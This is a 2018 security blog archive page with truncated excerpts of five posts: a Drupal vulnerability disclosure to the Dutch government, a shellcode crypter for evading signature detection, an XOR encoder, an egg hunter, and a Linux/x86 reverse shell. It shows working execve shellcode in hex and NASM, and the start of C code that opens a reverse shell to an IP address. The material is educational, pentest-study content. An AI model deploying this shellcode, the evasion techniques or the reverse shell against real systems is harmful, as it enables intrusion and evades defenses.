Month: July 2018

Hacking the Dutch Government – Responsible Disclosure

Hacking the Dutch Government – Responsible Disclosure

Security, Vulnerabilities
... and all I got was a lousy t-shirt The Dutch Government "Rijksoverheid" has this responsible disclosure program where if you manage to find a vulnerability in one of their systems, they reward you with a shirt having a small logo of their National Cyber Security Centre (NCSC) together with "I hacked the Dutch Government and all I got was this lousy t-shirt". Quite humorous eh? So visiting one of their websites I've managed to find a CHANGELOG.txt which is a file commonly left when an administrator installs and doesn't clean up. This CHANGLOG.txt basically shows critical information. Seeing that the current Drupal version installed is 7.43 (which is already outdated), one might think that this should be vulnerable to CVE-2018-7600 or "Drupalgeddon", a vulnerability that ...
Shellcode Crypter – Linux/x86

Shellcode Crypter – Linux/x86

Security
A "crypter" is quite interesting because of the fact that it scrambles a shellcode so it can evade signature matching using an encryption algorithm. This is why "crypters" are quite advantageous to use in penetration testing engagements but for this article, I'll show how a basic "crypter" can work. The first requirement is a shellcode to encrypt. I'll be using an execve shellcode which executes /bin/sh in this case. \x31\xc0\x50\x50\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x64\x24\x0c\x89\xe3\x8d\x4c\x24\x0c\x8b\x54\x24\x10\xb0\x0b\xcd\x80 This shellcode is based from the NASM program: global _start global _start section .text _start: xor eax, eax push eax push eax push eax push "//sh" push "/bin" mov dword[esp + 12], esp mov ebx, esp lea ecx, [esp ...
Custom Shellcode Encoder – X+1 XOR 0xAA (Linux/x86)

Custom Shellcode Encoder – X+1 XOR 0xAA (Linux/x86)

Security
Encoders are quite useful in cases where there are restricted characters in an application being exploited. Popular encoders can be found in Metasploit like shikata_ga_nai and many more. To demonstrate how encoders work, I've created a very basic encoder which adds 1 byte to each shellcode characters and the result gets XOR'd with 0xAA. The formula goes something like this: (X + 1) xor 0xAA = Y, where X is a byte of the shellcode and Y is the encoded byte Y in this case can be transformed back to X using the formula: (Y xor 0xAA) - 1 = X, where Y is the encoded byte and X is the original shellcode byte To do this, suppose we have an execve NASM program that runs /bin/sh: global _start global _start section .text _start: xor eax, eax push eax push eax push eax push ...
Egg Hunter – Shellcode (Linux/x86)

Egg Hunter – Shellcode (Linux/x86)

Security
An egg hunter is usually used in exploit development. To give a brief description, this "process" is implemented when there is a small space for the shellcode's storage during exploitation. What the egg hunter does is it tries to find the "egg" in the whole virtual address space (memory) as it is an indication of the start of another shellcode which couldn't fit in the buffer of an application being exploited. During my time on "Penetration Testing with Kali (PWK-OSCP)", I remember coming across this exploit which had the string "n00bn00b" before the shellcode. It looked something like this: At first, I didn't really mind it because I thought it was just an adjustment for the correct offset of the EIP overwriting but what I previously couldn't understand is why I should wait ...
Reverse Shell – Shellcode (Linux/x86)

Reverse Shell – Shellcode (Linux/x86)

Security
A reverse shell is basically the opposite of bind shell. Instead of having the remote machine listen for incoming connections, the penetration tester's machine is the one who's listening. There are pros and cons of using a reverse shell vs bind shell but this solely depends on how the network of connecting parties are set. First, to be able to create a working "reverse shell", a C program has been created to test the functionality of the APIs used. #include <unistd.h> #include <arpa/inet.h> int main() { struct sockaddr_in addr; addr.sin_family = AF_INET; addr.sin_port = htons(443); addr.sin_addr.s_addr = inet_addr("192.168.189.132"); int sockfd = socket(AF_INET, SOCK_STREAM, 0); connect(sockfd, (struct sockaddr*)&addr, sizeof(addr)); dup2(sockfd, ...